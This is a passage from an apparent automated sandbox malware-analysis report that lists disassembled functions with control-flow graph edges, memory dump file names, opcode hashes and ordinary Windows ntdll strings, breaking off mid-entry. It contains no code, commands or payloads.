                control_flow_graph 17 42e1e0-42e204 call 42e6d3 20 42e209-42e210 17->20 21 42e21f-42e224 20->21 22 42e226-42e22e 21->22 23 42e27e-42e283 21->23 24 42e22f 22->24 25 42e23e-42e243 24->25 26 42e256-42e27b 25->26 27 42e245-42e24d 25->27 26->23 28 42e253 27->28 28->26
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2ceae1a592c5aa9c24b884000b4813f64f69adc33d5eca27968a78ae953d0f99
                • Instruction ID: 14b503e4b4dbf4a94af14bba9f0082b6c658a07d39a71e0c42bec1849d99252b
                • Opcode Fuzzy Hash: 2ceae1a592c5aa9c24b884000b4813f64f69adc33d5eca27968a78ae953d0f99
                • Instruction Fuzzy Hash: 13015671D1032C56EB60FBA9AD42FD973B89B04304F4046DAB50CA6181FE74578CCF65
                Function 0042E1E3 Relevance: .0, Instructions: 44COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 31 42e1e3-42e224 call 42e6d3 35 42e226-42e243 31->35 36 42e27e-42e283 31->36 39 42e256-42e27b 35->39 40 42e245-42e24d 35->40 39->36 41 42e253 40->41 41->39
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1e08184f4ac4478ee332d2b1b8cca028d09cfda6cc3f20e5c521ef6c3af75e5a
                • Instruction ID: 127a4dcd22573884f948fd3c56ad155cbe9f07fd1aa0e13e2caf42441fe7631d
                • Opcode Fuzzy Hash: 1e08184f4ac4478ee332d2b1b8cca028d09cfda6cc3f20e5c521ef6c3af75e5a
                • Instruction Fuzzy Hash: 32015671D1032C56EB60FB999D42FD973B85B04304F4046DAB50CA6181EE74578CCF65
                Function 0042E594 Relevance: .0, Instructions: 33COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 44 42e594-42e5ce 45 42e5d4-42e5e5 44->45
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1cf5ac5d07dc1adbc98e8feca5841ebe62ac76af760b6f22fcdd76b91af82424
                • Instruction ID: 468f0cba1bd46181291fbb9e0a631c89db09a513db55b99bad26aa58490c7061
                • Opcode Fuzzy Hash: 1cf5ac5d07dc1adbc98e8feca5841ebe62ac76af760b6f22fcdd76b91af82424
                • Instruction Fuzzy Hash: 31F01D76650209AFDB05CF55C881EEA77A9FF48310F08815DBC19CB642D778E511CBA4
                Function 0042E285 Relevance: .0, Instructions: 32COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 46 42e285-42e288 47 42e28a-42e28f 46->47 48 42e22f-42e243 46->48 50 42e256-42e283 48->50 51 42e245-42e24d 48->51 52 42e253 51->52 52->50
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 620ea372d248d728081e89d8926d310f7674273f533dfcbe022cd2c2fdb62263
                • Instruction ID: 072733a89d86e1a20b37d7505ec4f0c36fdef33088d4e3396a9911416279adb3
                • Opcode Fuzzy Hash: 620ea372d248d728081e89d8926d310f7674273f533dfcbe022cd2c2fdb62263
                • Instruction Fuzzy Hash: 87F0BEB1E042685ADB60FBBA6C42BCE73689B04304F8445EAA50C92142EE3593488FA5
                Function 0042E70E Relevance: .0, Instructions: 29COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 56 42e70e-42e728 57 42e72e-42e735 56->57 58 42e737-42e739 57->58 59 42e749-42e74c 57->59 58->59 60 42e73b-42e747 call 42e6d3 58->60 60->59
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9b42d2634786242032c3cf20feeb3c5066281e123e526e87d56df8cf085e9bf0
                • Instruction ID: 53dceb39008c6f3320527b65ad23dff012749cc1a53a0a99b2c7f032207c0014
                • Opcode Fuzzy Hash: 9b42d2634786242032c3cf20feeb3c5066281e123e526e87d56df8cf085e9bf0
                • Instruction Fuzzy Hash: 88E04F76B5122137D2205686AD4AFAB676DDBC1B61F4D406AFA0CAB340D5B9D90082E8
                Function 0042E713 Relevance: .0, Instructions: 28COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 65 42e713-42e728 66 42e72e-42e735 65->66 67 42e737-42e739 66->67 68 42e749-42e74c 66->68 67->68 69 42e73b-42e747 call 42e6d3 67->69 69->68
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: df7bdc3ff78b4769467c641f53c7827f03c54f833d97224b3cb83331040601f0
                • Instruction ID: 86721405b170526936520b2b9391d4bcfdc03a2d3689df5cdf7690ad457e8398
                • Opcode Fuzzy Hash: df7bdc3ff78b4769467c641f53c7827f03c54f833d97224b3cb83331040601f0
                • Instruction Fuzzy Hash: F2E04876B5022527D120558A6C06F57776C9BC1B60F494066FE0897341D564A90042E8
                Function 0042E5A3 Relevance: .0, Instructions: 28COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 63 42e5a3-42e5ce 64 42e5d4-42e5e5 63->64
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1c1b9c3e4399eeba896e68a3f01f5d1adf480529a36e0dcae03ff96d9b24bc08
                • Instruction ID: dbe7326b6ecce26b87581471b72b6081cb43ca52ac60e9199f22fd608944d5c9
                • Opcode Fuzzy Hash: 1c1b9c3e4399eeba896e68a3f01f5d1adf480529a36e0dcae03ff96d9b24bc08
                • Instruction Fuzzy Hash: 1EF01C72610209AFCB04CF59C881EEB73ADFB88750F04C129FD198B241D774EA10CBA0
                Function 0042E633 Relevance: .0, Instructions: 13COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 72 42e633-42e646 73 42e64c-42e650 72->73
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6b7e1aa61001c2ad38e821b6909e094e9abcd2cfa45b901712d81ed3a5f18643
                • Instruction ID: bbb5f8cb07a0670ae8a8f12577331f64d48d0a93c97cfbbb82a283717230bf09
                • Opcode Fuzzy Hash: 6b7e1aa61001c2ad38e821b6909e094e9abcd2cfa45b901712d81ed3a5f18643
                • Instruction Fuzzy Hash: CAC080B16103087FD700EBCCDC46F6533DC970C610F408055B90C9B342D5B4F9108754

                Non-executed Functions

                Function 017F4A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 74 17f4a80-17f4a8b 75 17f4a9f-17f4aa6 74->75 76 17f4a8d-17f4a99 RtlDebugPrintTimes 74->76 77 17f4aaf-17f4ab6 call 17df5a0 75->77 78 17f4aa8-17f4aae 75->78 76->75 82 17f4b25-17f4b26 76->82 83 17f4ab8-17f4b22 call 17e1e46 * 2 77->83 84 17f4b23 77->84 83->84 84->82
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: 0I8w$0I8w$0I8w$0I8w$0I8w$0I8w
                • API String ID: 3446177414-2549722193
                • Opcode ID: 8fe2fd2dec0bb53050b335e3f4d5a80c47d401e4587c984e3b314f0e8d43d98a
                • Instruction ID: 642a4c457fd3b4170088bae6e042b33bf65aa7d9a3942671c84726ff07b2fd6e
                • Opcode Fuzzy Hash: 8fe2fd2dec0bb53050b335e3f4d5a80c47d401e4587c984e3b314f0e8d43d98a
                • Instruction Fuzzy Hash: 8601D232E8C6005BF7209A2C78087873AE1B388768FC5009EEB08CF388D2244B45DB90
                Function 017F2890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 285 17f2890-17f28b3 286 17f28b9-17f28cc 285->286 287 182a4bc-182a4c0 285->287 289 17f28ce-17f28d7 286->289 290 17f28dd-17f28df 286->290 287->286 288 182a4c6-182a4ca 287->288 288->286 291 182a4d0-182a4d4 288->291 289->290 292 182a57e-182a585 289->292 293 17f28e1-17f28e5 290->293 291->286 296 182a4da-182a4de 291->296 292->290 294 17f28eb-17f28fa 293->294 295 17f2988-17f298e 293->295 297 182a58a-182a58d 294->297 298 17f2900-17f2905 294->298 299 17f2908-17f290c 295->299 296->286 300 182a4e4-182a4eb 296->300 297->299 298->299 299->293 301 17f290e-17f291b 299->301 302 182a564-182a56c 300->302 303 182a4ed-182a4f4 300->303 304 182a592-182a599 301->304 305 17f2921 301->305 302->286 306 182a572-182a576 302->306 307 182a4f6-182a4fe 303->307 308 182a50b 303->308 317 182a5a1-182a5c9 call 1800050 304->317 310 17f2924-17f2926 305->310 306->286 311 182a57c call 1800050 306->311 307->286 312 182a504-182a509 307->312 309 182a510-182a536 call 1800050 308->309 325 182a55d-182a55f 309->325 314 17f2928-17f292a 310->314 315 17f2993-17f2995 310->315 311->325 312->309 321 17f292c-17f292e 314->321 322 17f2946-17f2966 call 1800050 314->322 315->314 319 17f2997-17f29b1 call 1800050 315->319 334 17f2969-17f2974 319->334 321->322 328 17f2930-17f2944 call 1800050 321->328 322->334 331 17f2981-17f2985 325->331 328->322 334->310 336 17f2976-17f2979 334->336 336->317 337 17f297f 336->337 337->331
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID:
                • API String ID: 48624451-0
                • Opcode ID: 12f1fb3187dde207b34df1c2011f0e4ab8fe05898b2a24b5367935f66e87e36b
                • Instruction ID: c80e5407fd37c4ea3255381c831aaac5b2857b3570c342a0ad276925b3f63576
                • Opcode Fuzzy Hash: 12f1fb3187dde207b34df1c2011f0e4ab8fe05898b2a24b5367935f66e87e36b
                • Instruction Fuzzy Hash: 6B51C3A6A00156AFCB15DBAC899097FFBB8BB48340B54826DF5A5E7642D334DE4087A0
                Function 017CA250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 338 17ca250-17ca26f 339 17ca58d-17ca594 338->339 340 17ca275-17ca291 338->340 339->340 343 17ca59a-18179bb 339->343 341 18179e6-18179eb 340->341 342 17ca297-17ca2a0 340->342 342->341 344 17ca2a6-17ca2ac 342->344 343->340 348 18179c1-18179c6 343->348 346 17ca6ba-17ca6bc 344->346 347 17ca2b2-17ca2b4 344->347 349 17ca2ba-17ca2bd 346->349 350 17ca6c2 346->350 347->341 347->349 351 17ca473-17ca479 348->351 349->341 352 17ca2c3-17ca2c6 349->352 350->352 353 17ca2c8-17ca2d1 352->353 354 17ca2da-17ca2dd 352->354 355 18179cb-18179d5 353->355 356 17ca2d7 353->356 357 17ca6c7-17ca6d0 354->357 358 17ca2e3-17ca32b 354->358 360 18179da-18179e3 call 183f290 355->360 356->354 357->358 359 17ca6d6-18179ff 357->359 361 17ca330-17ca335 358->361 359->360 360->341 364 17ca47c-17ca47f 361->364 365 17ca33b-17ca343 361->365 366 17ca34f-17ca35d 364->366 367 17ca485-17ca488 364->367 365->366 369 17ca345-17ca349 365->369 370 17ca48e-17ca49e 366->370 371 17ca363-17ca368 366->371 367->370 372 1817a16-1817a19 367->372 369->366 373 17ca59f-17ca5a8 369->373 370->372 376 17ca4a4-17ca4ad 370->376 374 17ca36c-17ca36e 371->374 372->374 375 1817a1f-1817a24 372->375 377 17ca5aa-17ca5ac 373->377 378 17ca5c0-17ca5c3 373->378 381 1817a26 374->381 382 17ca374-17ca38c call 17ca6e0 374->382 383 1817a2b 375->383 376->374 377->366 384 17ca5b2-17ca5bb 377->384 379 1817a01 378->379 380 17ca5c9-17ca5cc 378->380 385 1817a0c 379->385 380->385 386 17ca5d2-17ca5d5 380->386 381->383 391 17ca4b2-17ca4b9 382->391 392 17ca392-17ca3ba 382->392 388 1817a2d-1817a2f 383->388 384->374 385->372 386->377 388->351 390 1817a35 388->390 393 17ca3bc-17ca3be 391->393 394 17ca4bf-17ca4c2 391->394 392->393 393->388 395 17ca3c4-17ca3cb 393->395 394->393 396 17ca4c8-17ca4d3 394->396 397 1817ae0 395->397 398 17ca3d1-17ca3d4 395->398 396->361 400 1817ae4-1817afc call 183f290 397->400 399 17ca3e0-17ca3ea 398->399 399->400 401 17ca3f0-17ca40c call 17ca840 399->401 400->351 406 17ca5d7-17ca5e0 401->406 407 17ca412-17ca417 401->407 409 17ca601-17ca603 406->409 410 17ca5e2-17ca5eb 406->410 407->351 408 17ca419-17ca43d 407->408 411 17ca440-17ca443 408->411 413 17ca629-17ca631 409->413 414 17ca605-17ca623 call 17b4508 409->414 410->409 412 17ca5ed-17ca5f1 410->412 415 17ca4d8-17ca4dc 411->415 416 17ca449-17ca44c 411->416 417 17ca5f7-17ca5fb 412->417 418 17ca681-17ca6ab RtlDebugPrintTimes 412->418 414->351 414->413 423 1817a3a-1817a42 415->423 424 17ca4e2-17ca4e5 415->424 420 1817ad6 416->420 421 17ca452-17ca454 416->421 417->409 417->418 418->409 432 17ca6b1-17ca6b5 418->432 420->397 426 17ca45a-17ca461 421->426 427 17ca520-17ca539 call 17ca6e0 421->427 428 17ca634-17ca64a 423->428 429 1817a48-1817a4c 423->429 424->428 430 17ca4eb-17ca4ee 424->430 433 17ca57b-17ca582 426->433 434 17ca467-17ca46c 426->434 444 17ca65e-17ca665 427->444 445 17ca53f-17ca567 427->445 435 17ca4f4-17ca50c 428->435 436 17ca650-17ca659 428->436 429->428 437 1817a52-1817a5b 429->437 430->416 430->435 432->409 433->399 441 17ca588 433->441 434->351 440 17ca46e 434->440 435->416 438 17ca512-17ca51b 435->438 436->421 442 1817a85-1817a87 437->442 443 1817a5d-1817a60 437->443 438->421 440->351 441->397 442->428 446 1817a8d-1817a96 442->446 447 1817a62-1817a6c 443->447 448 1817a6e-1817a71 443->448 451 17ca569-17ca56b 444->451 452 17ca66b-17ca66e 444->452 445->451 446->421 453 1817a81 447->453 449 1817a73-1817a7c 448->449 450 1817a7e 448->450 449->446 450->453 451->434 454 17ca571-17ca573 451->454 452->451 455 17ca674-17ca67c 452->455 453->442 456 17ca579 454->456 457 1817a9b-1817aa4 454->457 455->411 456->433 457->456 458 1817aaa-1817ab0 457->458 458->456 459 1817ab6-1817abe 458->459 459->456 460 1817ac4-1817acf 459->460 460->459 461 1817ad1 460->461 461->456
                Strings
                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 018179D5
                • RtlpFindActivationContextSection_CheckParameters, xrefs: 018179D0, 018179F5
                • SsHd, xrefs: 017CA3E4
                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 018179FA
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                • API String ID: 0-929470617
                • Opcode ID: 14447bd25f17c846db8dd02733541bb8d69dfdcfd47e2288921eeb113ffd9718
                • Instruction ID: 9b8647e401041143663c5cd49dd0dd4dd550effde6b7ff1251b513a1eeb33b49
                • Opcode Fuzzy Hash: 14447bd25f17c846db8dd02733541bb8d69dfdcfd47e2288921eeb113ffd9718
                • Instruction Fuzzy Hash: 34E1F7716043058FE725CE2CC894B2AFBE5BB84B15F144A2DF956CB291F731DA45CB81
                Function 017CD770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                Download Yara Rule
                APIs
                Strings
                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01819346
                • RtlpFindActivationContextSection_CheckParameters, xrefs: 01819341, 01819366
                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0181936B
                • GsHd, xrefs: 017CD874
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                • API String ID: 3446177414-576511823
                • Opcode ID: 91e7214dc49cc5f06ef509308d93f3447e14619368b86e5214cee9f6b32b3d7a
                • Instruction ID: f6f9ef5a24be06a51522d5d01fc78f64d4a72f89233ab6d92b4209a15a66a9f5
                • Opcode Fuzzy Hash: 91e7214dc49cc5f06ef509308d93f3447e14619368b86e5214cee9f6b32b3d7a
                • Instruction Fuzzy Hash: 48E1A175A043428FDB24CF58C490B6AFBE5BB88718F044A7DE995DB285D770E944CB82
                Function 017FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-$0$0
                • API String ID: 1302938615-699404926
                • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                • Instruction ID: 7940fe1683dbd4291575a3d227d7bcf7927c43b364d894cd73c445cbaea726ef
                • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                • Instruction Fuzzy Hash: D5819070E452499EEF258E6CC8917FFFBB2AF85360F18415EDA61A7391C73498408BA1
                Function 017B9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: $$@
                • API String ID: 3446177414-1194432280
                • Opcode ID: 98157cd49f2e518ea78262947ba25fbe06a8c881ddcadbf713ac1ec788541d0c
                • Instruction ID: a89ee2d04035de079721fb1e00db838915c38f37c0a4f023095783030e98704e
                • Opcode Fuzzy Hash: 98157cd49f2e518ea78262947ba25fbe06a8c881ddcadbf713ac1ec788541d0c
                • Instruction Fuzzy Hash: E6811DB2D002699BDB31CB54CC45BEEB7B9AF48754F1041DAEA19B7284E7305E84DFA0
                Function 017F4960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: 0I8w$0I8w$0I8w$X
                • API String ID: 3446177414-113150377
                • Opcode ID: 2e4a1412a35e35ea7f06920e5600a3f3ce2f8c83d92dcdcb79eb59bb62b08bdd
                • Instruction ID: 840a6effc4e2d805bbf14e1d9f0f4926556c367deca4917dc9225c67ac699b7e
                • Opcode Fuzzy Hash: 2e4a1412a35e35ea7f06920e5600a3f3ce2f8c83d92dcdcb79eb59bb62b08bdd
                • Instruction Fuzzy Hash: 2E318F31D0420AFBDF22CF98D844B8FBBB1AB88754F45406DFA1596345D2789B54CF45
                Function 017DDB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                • API String ID: 3446177414-56086060
                • Opcode ID: 6302f538c8a1d0bdc25baca7a0137bba5c0185ee49a060266c4dafdac0430a91
                • Instruction ID: 80e4d0308b2747f1262ec2b65cc11659a3f7ba777955ec5f8192f7608477accb
                • Opcode Fuzzy Hash: 6302f538c8a1d0bdc25baca7a0137bba5c0185ee49a060266c4dafdac0430a91
                • Instruction Fuzzy Hash: 41418972600349DFD722EF6CC498B6AF7B8FF40328F144569E64287295CB74AA84CB81
                Function 01834755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                Download Yara Rule
                APIs
                Strings
                • minkernel\ntdll\ldrredirect.c, xrefs: 01834899
                • LdrpCheckRedirection, xrefs: 0183488F
                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01834888
                Memory Dump Source
